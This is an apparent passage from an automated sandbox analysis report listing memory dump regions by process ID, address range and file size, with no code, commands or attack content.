                                                                                                                                                                                                                                                                                                                                • memory/5176-597-0x0000000000A30000-0x0000000000A33000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  12KB

                                                                                                                                                                                                                                                                                                                                • memory/5276-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5408-343-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5428-345-0x0000000000E90000-0x0000000000E91000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                • memory/5428-344-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5428-600-0x00000000057E0000-0x00000000057E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                • memory/5460-579-0x0000000002330000-0x0000000002332000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                • memory/5536-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5556-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5556-595-0x0000000005040000-0x00000000052C6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  2.5MB

                                                                                                                                                                                                                                                                                                                                • memory/5572-482-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                • memory/5572-350-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5584-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5672-425-0x0000000004C12000-0x0000000004C13000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                • memory/5672-592-0x0000000004C13000-0x0000000004C14000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                • memory/5672-407-0x0000000004C10000-0x0000000004C11000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                • memory/5672-395-0x0000000004C14000-0x0000000004C16000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                • memory/5672-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5688-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5696-358-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5704-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5712-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5744-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                • memory/5856-559-0x0000000005F90000-0x0000000005F91000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                • memory/5864-567-0x00000000055E0000-0x00000000055E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                • memory/5880-420-0x000000001B040000-0x000000001B042000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                • memory/5904-520-0x00000000057B0000-0x00000000057B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                • memory/5956-430-0x0000000000EF0000-0x0000000001246000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  3.3MB

                                                                                                                                                                                                                                                                                                                                • memory/5956-603-0x0000000000E90000-0x0000000000EA1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  68KB

                                                                                                                                                                                                                                                                                                                                • memory/5964-542-0x0000000005600000-0x0000000005601000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                • memory/5972-375-0x0000000002810000-0x0000000002820000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                                                                • memory/5972-387-0x0000000002830000-0x0000000002842000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  72KB

                                                                                                                                                                                                                                                                                                                                • memory/5976-435-0x0000000002780000-0x0000000002782000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                • memory/6112-572-0x0000019E22593000-0x0000019E22595000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                • memory/6112-456-0x0000019E22596000-0x0000019E22597000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                • memory/6112-472-0x0000019E22590000-0x0000019E22592000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                • memory/6112-383-0x0000019E07B40000-0x0000019E07D60000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  2.1MB

                                                                                                                                                                                                                                                                                                                                • memory/6120-554-0x00000000055E0000-0x00000000055E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  4KB